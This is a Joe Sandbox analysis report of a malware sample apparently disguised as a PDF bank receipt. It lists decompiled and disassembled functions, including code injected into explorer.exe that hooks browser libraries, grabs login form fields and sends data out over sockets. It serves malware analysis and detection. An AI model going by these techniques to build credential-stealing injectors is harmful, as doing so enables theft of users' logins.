API ID: lstrcpywsprintf
String ID: callback%d$error
API String ID: 2408954437-1307476583
Opcode ID: 916b5a5b3868b65d62d261b55ee77fa41c915923caa4ae107988a79ea6125c6c
Instruction ID: 85ff90a650f6db99db1fb8cc9b61fca88a575cc014b48a402e8af0f9a8e93c31
Opcode Fuzzy Hash: 916b5a5b3868b65d62d261b55ee77fa41c915923caa4ae107988a79ea6125c6c
Instruction Fuzzy Hash: 71F01270204110DFDB04CB99D999DB673E9FF85310F06C4ACF9698B311E770AC469B95

Uniqueness

Uniqueness Score: -1.00%

Function 00405D2C Relevance: 5.0, APIs: 4, Instructions: 37
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405D2C(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}

0x00405d3c
0x00405d3e
0x00405d41
0x00405d6d
0x00405d46
0x00405d4f
0x00405d54
0x00405d5f
0x00405d62
0x00405d7e
0x00405d64
0x00405d6b
0x00000000
0x00405d6b
0x00405d77
0x00405d7b
0x00405d7b
0x00405d75
0x00000000

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F87,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D3C
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405D54
CharNextA.USER32(00000000,?,00000000,00405F87,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D65
lstrlenA.KERNEL32(00000000,?,00000000,00405F87,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D6E

Memory Dump Source

Source File: 00000000.00000002.3223507204.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3223451448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223585427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.000000000078D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.0000000000791000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007BD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000007F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3223625436.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3225698903.00000000008BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_E-DEKONT_pdf.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
Instruction ID: 56b30ab9728cc1bcdc2a7ccee21f79e87515508fba5cd4226cf82d87f860e42d
Opcode Fuzzy Hash: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
Instruction Fuzzy Hash: 0AF0C231204818AFCB029FA4DD44D9EBBA8EF56350B2580BAE840F7211D634DE019BA8

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: explorer.exePID: 4836, Parent PID: 1508COMMON

Execution Graph

Execution Coverage:	2.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	9.4%
Total number of Nodes:	457
Total number of Limit Nodes:	19

Executed Functions

Function 0B44BF82 Relevance: 23.6, APIs: 3, Strings: 10, Instructions: 815
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

getaddrinfo.WS2_32 ref: 0B44C12E
setsockopt.WS2_32 ref: 0B44C830
recv.WS2_32 ref: 0B44C859

Strings

dat=, xrefs: 0B44C290
&un=, xrefs: 0B44C4F1
nnec, xrefs: 0B44C32A
GET , xrefs: 0B44C318
Co, xrefs: 0B44C323
ose, xrefs: 0B44C33F
&br=, xrefs: 0B44C509
&sql, xrefs: 0B44C471
tion, xrefs: 0B44C331
: cl, xrefs: 0B44C338

Memory Dump Source

Source File: 00000002.00000002.7578827334.000000000B340000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b340000_explorer.jbxd

Similarity

API ID: getaddrinforecvsetsockopt
String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
API String ID: 1564272048-1117930895
Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
Instruction ID: 6d73e991019a2318065f7699ce1d65abc6d23aa80225a0bb3b21896b7985a392
Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
Instruction Fuzzy Hash: BE525D30614A088FEB69EF68C4C57EAB7E1FB54300F54462EC49BC7246DF74AA56CB81

Uniqueness

Uniqueness Score: -1.00%

Function 0B44B232 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 642
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL ref: 0B44B449

Strings

`, xrefs: 0B44B41D

Memory Dump Source

Source File: 00000002.00000002.7578827334.000000000B340000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b340000_explorer.jbxd

Similarity

API ID: CreateFile
String ID: `
API String ID: 823142352-2679148245
Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
Instruction ID: 403a5c86f290dd2fbbdf28dd44be0f41944447873e0bdbdc287b2bb7f5b52bae
Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
Instruction Fuzzy Hash: 57221A70A18A099FDB59DF28C4997AAF7E1FB98301F40462EE45ED7250DB30E562CB81

Uniqueness

Uniqueness Score: -1.00%

Function 0B44CE12 Relevance: 1.6, APIs: 1, Instructions: 59
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL ref: 0B44CE67

Memory Dump Source

Source File: 00000002.00000002.7578827334.000000000B340000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b340000_explorer.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
Instruction ID: ad467ed7d13b29503fe7ec50fa4e03b67d96afe6f999489cd2f08345c0e09056
Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
Instruction Fuzzy Hash: 20015E34668B484F9B88EF6C948522AB7E4FBDA215F000B3EE99AC7254EB64D5414742

Uniqueness

Uniqueness Score: -1.00%

Function 0B44CE0A Relevance: 1.6, APIs: 1, Instructions: 52
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL ref: 0B44CE67

Memory Dump Source

Source File: 00000002.00000002.7578827334.000000000B340000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b340000_explorer.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
Instruction ID: 8681514f61a8ce2f5dc8eb0c24b317407be159ee64398611f0f01da0c0896822
Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
Instruction Fuzzy Hash: F701A234628B884F9B48EB2C94422A6B3E5FBCE314F000B3FE99AC3241DB21D5024782

Uniqueness

Uniqueness Score: -1.00%

Function 0B4468C2 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ObtainUserAgentString.URLMON ref: 0B4469A0

Strings

on.d, xrefs: 0B446902
nt: , xrefs: 0B44691E
urlmon.dll, xrefs: 0B446959
User-Agent: , xrefs: 0B446935, 0B446948

Memory Dump Source

Source File: 00000002.00000002.7578827334.000000000B340000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b340000_explorer.jbxd

Similarity

API ID: AgentObtainStringUser
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 2681117516-319646191
Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction ID: 7fb65479bfd01f4e4c391c55dfdbe62a76f94e8ba07254bfb517f99ac0ce962f
Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction Fuzzy Hash: 2431CC31A14A0C8FDB05EFA9C8857EEBBE0FB58208F40022BD44ED7240DF788A45C789

Uniqueness

Uniqueness Score: -1.00%

Function 0B4468BE Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 94
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ObtainUserAgentString.URLMON ref: 0B4469A0

Strings

on.d, xrefs: 0B446902
nt: , xrefs: 0B44691E
urlmon.dll, xrefs: 0B446959
User-Agent: , xrefs: 0B446935, 0B446948

Memory Dump Source

Source File: 00000002.00000002.7578827334.000000000B340000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b340000_explorer.jbxd

Similarity

API ID: AgentObtainStringUser
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 2681117516-319646191
Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction ID: cb13efef648521c1d3621b80fdbd8cdc23fd1d9b852de8090d3a92520290436a
Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction Fuzzy Hash: 61218D70A14A4C8EDB05EFA9C8857EEBBB5FB58208F40422FD45AD7240DF748A55CB89

Uniqueness

Uniqueness Score: -1.00%

Function 0B442B66 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNEL32 ref: 0B442CCA

Strings

.dll, xrefs: 0B442BCD
kern, xrefs: 0B442B99
el32, xrefs: 0B442BA0

Memory Dump Source

Source File: 00000002.00000002.7578827334.000000000B340000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b340000_explorer.jbxd

Similarity

API ID: CreateMutex
String ID: .dll$el32$kern
API String ID: 1964310414-1222553051
Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
Instruction ID: ffe7414caf24841dbb2cef75f7edf3d484baa1243fcaf15208f6aed56029f32a
Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
Instruction Fuzzy Hash: 78416970928A088FEB54EFA8C8957ADB7E0FF58300F00427AD84ADB255DB709A55CB85

Uniqueness

Uniqueness Score: -1.00%

Function 0B442B72 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNEL32 ref: 0B442CCA

Strings

.dll, xrefs: 0B442BCD
kern, xrefs: 0B442B99
el32, xrefs: 0B442BA0

Memory Dump Source

Source File: 00000002.00000002.7578827334.000000000B340000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b340000_explorer.jbxd

Similarity

API ID: CreateMutex
String ID: .dll$el32$kern
API String ID: 1964310414-1222553051
Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
Instruction ID: def93e1117db3b2f4f43cd0eee8831189b6937c7bc517c65f2479ef9332937bf
Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
Instruction Fuzzy Hash: 8F411970928A088FDB94EFA8C4997AD77F0FF58300F04417AD84ADB255DB349A55CB85

Uniqueness

Uniqueness Score: -1.00%

Function 0B44872E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

connect.WS2_32 ref: 0B448791

Strings

ect, xrefs: 0B448761
conn, xrefs: 0B44875A

Memory Dump Source

Source File: 00000002.00000002.7578827334.000000000B340000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b340000_explorer.jbxd

Similarity

API ID: connect
String ID: conn$ect
API String ID: 1959786783-716201944
Opcode ID: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
Instruction ID: 17389ff73bd7262d7f2919e57ba39e9e849d01567ee28d36859c422e9f9ec5a2
Opcode Fuzzy Hash: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
Instruction Fuzzy Hash: 51014C30618B188FCB84EF1CE088B55B7E0EB58314F1545AED90DCB226C774C9818BC2

Uniqueness

Uniqueness Score: -1.00%

Function 0B448732 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

connect.WS2_32 ref: 0B448791

Strings

ect, xrefs: 0B448761
conn, xrefs: 0B44875A

Memory Dump Source

Source File: 00000002.00000002.7578827334.000000000B340000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b340000_explorer.jbxd

Similarity

API ID: connect
String ID: conn$ect
API String ID: 1959786783-716201944
Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
Instruction ID: 4d22fb1dc9fd1bbdcb52a17c048181851097ebed927282a69db1af21e1b0b31a
Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
Instruction Fuzzy Hash: 60014F70618A1C8FCB88EF5CE489B55B7E0FB59314F1541AEE80DCB226CB74C9818BC2

Uniqueness

Uniqueness Score: -1.00%

Function 0B4486B2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

send.WS2_32 ref: 0B448713

Strings

send, xrefs: 0B4486DA

Memory Dump Source

Source File: 00000002.00000002.7578827334.000000000B340000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b340000_explorer.jbxd

Similarity

API ID: send
String ID: send
API String ID: 2809346765-2809346765
Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
Instruction ID: 5a2d4e7aedc6f990fcd2611b6612319b0a73396ccd2b5225e240b427a488ea5c
Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
Instruction Fuzzy Hash: B9011270518A188FDB88EF5CD449B2577E0EB58314F1545AED85DCB266C670D9818B81

Uniqueness

Uniqueness Score: -1.00%

Function 0B4485B2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

socket.WS2_32 ref: 0B448611

Strings

sock, xrefs: 0B4485D9

Memory Dump Source

Source File: 00000002.00000002.7578827334.000000000B340000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b340000_explorer.jbxd

Similarity

API ID: socket
String ID: sock
API String ID: 98920635-2415254727
Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
Instruction ID: 02bb4422f113ca19cc17f537551d2cf740b6af2a9d2396fa0f6f814195f56c1a
Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
Instruction Fuzzy Hash: 8A012C70618A188FCB84EF1CE049B55BBE0FB59314F1545AEE85ECB266C7B0C9818B86

Uniqueness

Uniqueness Score: -1.00%

Function 0B4402DD Relevance: 1.6, APIs: 1, Instructions: 91
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SleepEx.KERNEL32 ref: 0B44032D

Memory Dump Source

Source File: 00000002.00000002.7578827334.000000000B340000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b340000_explorer.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
Instruction ID: e148aef97319da8f6e8abc6a384662badf8b1ef0a104497f8d4f20c480d48a1f
Opcode Fuzzy Hash: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
Instruction Fuzzy Hash: 1D315A70614B09DFEB64AF6980492A6BBA1FB54300F44426FCA2DCB306CB749670CF95

Uniqueness

Uniqueness Score: -1.00%

Function 0B44CE92 Relevance: 1.6, APIs: 1, Instructions: 74
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL ref: 0B44CF02

Memory Dump Source

Source File: 00000002.00000002.7578827334.000000000B340000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b340000_explorer.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: aa46afc7774090f079fb081d1b4360f3c2f4c3fe8220be198c2b78210d39b2a1
Instruction ID: c3372e069f41c1abb34e3cd5f3af07ba618cec1effcd65c4f1a7e1a322b85ad8
Opcode Fuzzy Hash: aa46afc7774090f079fb081d1b4360f3c2f4c3fe8220be198c2b78210d39b2a1
Instruction Fuzzy Hash: 2E11A124328F0E4FBB99EB6D88D933B73D1FBD8251B44862F945AC3344DF20C9514642

Uniqueness

Uniqueness Score: -1.00%

Function 0B440412 Relevance: 1.5, APIs: 1, Instructions: 46
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNEL32 ref: 0B440461

Memory Dump Source

Source File: 00000002.00000002.7578827334.000000000B340000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b340000_explorer.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
Instruction ID: 1e24d8d6194458e4847596ca4f28509265f53747e7a6f1f87dcb6472a8bb9e2f
Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
Instruction Fuzzy Hash: A5F0C230668A484FEB88EF2CD44662AB3E0EBA8215F44063FA54DC3264DA69C6814716

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 02E4AD02 Relevance: 14.2, Strings: 11, Instructions: 404COMMON

Download Yara Rule

Strings

M, xrefs: 02E4B082
32.d, xrefs: 02E4AF0B
net., xrefs: 02E4AF44
.dll, xrefs: 02E4AF2F
wini, xrefs: 02E4AF72
dll, xrefs: 02E4AF4C
ll, xrefs: 02E4AF13
kern, xrefs: 02E4AF5A
user, xrefs: 02E4AF03
S, xrefs: 02E4B073
el32, xrefs: 02E4AF27

Memory Dump Source

Source File: 00000002.00000002.7562038018.0000000002E20000.00000040.00000001.00040000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2e20000_explorer.jbxd

Similarity

API ID:
String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
API String ID: 0-393284711
Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
Instruction ID: 5ef5c62bcee32413e9cfc0ab0d12a1c149942123ef4eec4bc28f7ef76dab07f8
Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
Instruction Fuzzy Hash: 08E17B70528F588FC764EF68C4847AAB7E1FB58304F509A2EA99FC7245DF30A541CB85

Uniqueness

Uniqueness Score: -1.00%

Function 02E4D792 Relevance: 21.6, Strings: 17, Instructions: 321COMMON

Download Yara Rule

Strings

itUR, xrefs: 02E4D85D
user, xrefs: 02E4D876
encr, xrefs: 02E4D89D
rnam, xrefs: 02E4D8B5
name, xrefs: 02E4D87D
ypte, xrefs: 02E4D8DA
form, xrefs: 02E4D84D
encr, xrefs: 02E4D8D2
ypte, xrefs: 02E4D8A5
Fiel, xrefs: 02E4D884
d, xrefs: 02E4D8F2
e, xrefs: 02E4D8BD
dPas, xrefs: 02E4D8E2
Subm, xrefs: 02E4D855
dUse, xrefs: 02E4D8AD
swor, xrefs: 02E4D8EA
guid, xrefs: 02E4D7CE

Memory Dump Source

Source File: 00000002.00000002.7562038018.0000000002E20000.00000040.00000001.00040000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2e20000_explorer.jbxd

Similarity

API ID:
String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
API String ID: 0-2916316912
Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
Instruction ID: 28806f9bcc9852dcf8ddb89842de1fd49c2ecef9ae60e760e3b3baa03acf3e81
Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
Instruction Fuzzy Hash: 3AB16E30528B488EDB55EF68C485AEEB7F2FF98300F90951EE49AC7251DF709505CB85

Uniqueness

Uniqueness Score: -1.00%

Function 02E4B622 Relevance: 21.4, Strings: 17, Instructions: 151COMMON

Download Yara Rule

Strings

e, xrefs: 02E4B66D
u, xrefs: 02E4B661
t, xrefs: 02E4B6C8
l, xrefs: 02E4B6D6
n, xrefs: 02E4B6BA
2, xrefs: 02E4B674
l, xrefs: 02E4B6AC
p, xrefs: 02E4B690
s, xrefs: 02E4B689
l, xrefs: 02E4B682
d, xrefs: 02E4B6CF
c, xrefs: 02E4B697
d, xrefs: 02E4B6A5
i, xrefs: 02E4B69E
d, xrefs: 02E4B67B
w, xrefs: 02E4B6B3
n, xrefs: 02E4B6C1

Memory Dump Source

Source File: 00000002.00000002.7562038018.0000000002E20000.00000040.00000001.00040000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2e20000_explorer.jbxd

Similarity

API ID:
String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
API String ID: 0-1539916866
Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
Instruction ID: 50c4b38b1b7438c85456ee31d9ecaec01740b371f30dcfdfb90714f4c21254d4
Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
Instruction Fuzzy Hash: A941A170A18B08CFDF14DF88A4496AE7BE2EB48708F00425EE809D3245DBB5E9458BD6

Uniqueness

Uniqueness Score: -1.00%

Function 02E52AB2 Relevance: 17.8, Strings: 14, Instructions: 339COMMON

Download Yara Rule

Strings

[, xrefs: 02E52CCD
l, xrefs: 02E52CE2
n, xrefs: 02E52C98
[, xrefs: 02E52BF6
b, xrefs: 02E52C73
[, xrefs: 02E52C90
[, xrefs: 02E52C2D
], xrefs: 02E52CA8
[, xrefs: 02E52C66
], xrefs: 02E52C3D
c, xrefs: 02E52C0B
e, xrefs: 02E52CA0
D, xrefs: 02E52CDA
l, xrefs: 02E52C35

Memory Dump Source

Source File: 00000002.00000002.7562038018.0000000002E20000.00000040.00000001.00040000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2e20000_explorer.jbxd

Similarity

API ID:
String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
API String ID: 0-355182820
Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
Instruction ID: 472ad3d2cad8ae7c9b46da625b275298aaed8c4123815fd6e8bdbde591c3976f
Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
Instruction Fuzzy Hash: FBC16D70228B198FC759EF64C4856DAF3E1FB98304F40972EA99EC7250DF30A555CB86

Uniqueness

Uniqueness Score: -1.00%

Function 02E52F12 Relevance: 15.2, Strings: 12, Instructions: 201COMMON

Download Yara Rule

Strings

0, xrefs: 02E52F5B
c, xrefs: 02E52FC8
r, xrefs: 02E52FC0
r, xrefs: 02E52FA8
., xrefs: 02E52F63
r, xrefs: 02E52F90
r, xrefs: 02E52FA0
r, xrefs: 02E52F98
r, xrefs: 02E52FB8
n, xrefs: 02E52F6B
r, xrefs: 02E52FB0
r, xrefs: 02E52F88

Memory Dump Source

Source File: 00000002.00000002.7562038018.0000000002E20000.00000040.00000001.00040000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2e20000_explorer.jbxd

Similarity

API ID:
String ID: .$0$c$n$r$r$r$r$r$r$r$r
API String ID: 0-97273177
Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
Instruction ID: 6b065071ddd90a28a2c00b2a094388ca53e8c4a6dd3cae2f63d921113012bf1f
Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
Instruction Fuzzy Hash: 4951E3306687488FD719DF18C8812AAB7E5FBC5304F506A6EE8CBC7241DBB49546CF82

Uniqueness

Uniqueness Score: -1.00%

Function 02E4C2F4 Relevance: 10.4, Strings: 8, Instructions: 380COMMON

Download Yara Rule

Strings

dll, xrefs: 02E4C32E
l, xrefs: 02E4C4E2
sspi, xrefs: 02E4C320
cli., xrefs: 02E4C327
4.dl, xrefs: 02E4C4DB
opera_browser.dll, xrefs: 02E4C629
dragon_s.dll, xrefs: 02E4C614
nspr, xrefs: 02E4C4D4

Memory Dump Source

Source File: 00000002.00000002.7562038018.0000000002E20000.00000040.00000001.00040000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2e20000_explorer.jbxd

Similarity

API ID:
String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
API String ID: 0-639201278
Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
Instruction ID: 10682790cd33b7f1c54e484ceae12af6a3b147e7341bfd69b9187bc1fbcb3c72
Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
Instruction Fuzzy Hash: B5C1A270668A194FC758EF68D455AEAF3E1FB98304F90A36A984EC7254DF30DA01CBC5

Uniqueness

Uniqueness Score: -1.00%

Function 02E4C2F2 Relevance: 10.4, Strings: 8, Instructions: 380COMMON

Download Yara Rule

Strings

dll, xrefs: 02E4C32E
l, xrefs: 02E4C4E2
sspi, xrefs: 02E4C320
cli., xrefs: 02E4C327
4.dl, xrefs: 02E4C4DB
opera_browser.dll, xrefs: 02E4C629
dragon_s.dll, xrefs: 02E4C614
nspr, xrefs: 02E4C4D4

Memory Dump Source

